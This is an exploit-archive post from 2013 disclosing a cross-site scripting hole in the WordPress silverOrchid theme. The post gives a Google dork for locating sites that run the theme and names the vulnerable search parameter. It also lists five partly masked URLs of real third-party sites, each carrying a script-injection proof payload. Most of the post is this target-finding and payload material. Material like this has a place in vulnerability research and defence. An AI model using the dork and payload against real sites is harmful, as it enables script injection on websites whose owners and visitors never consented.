Home / exploitsPDF  

WordPress silverOrchid Cross Site Scripting

Posted on 29 August 2013

<pre>#******************************************************************************** # Exploit Title : wordpress silverOrchid theme Cross site scripting # # Exploit Author : Ashiyane Digital Security Team # # Tested on: Windows 7 , Linux # # Google Dork : intext:&quot;Powered by WordPress and theme by gazpo.com&quot; # # Date: 2013/08/27 # -------------------------------------------------------------------- # Location : [Target]/?s=[xss] # # Proof: # # http://www.alesXXpenezzi.com/wp/?s=&lt;script&gt;alert(1);&lt;/script&gt; # # http://www.bazaarXXXdeals.in/?s=&lt;script&gt;alert(1);&lt;/script&gt; # # http://www.novelthoXXtsblog.com/?s=&lt;script&gt;alert(1);&lt;/script&gt; # # http://perawatXulit.com/?s=&lt;script&gt;alert(1);&lt;/script&gt; # # http://www.walkingandhiXXgireland.com/?s=&lt;script&gt;alert(1);&lt;/script&gt; # ###################### discovered by : ACC3SS ###################### </pre>

 

TOP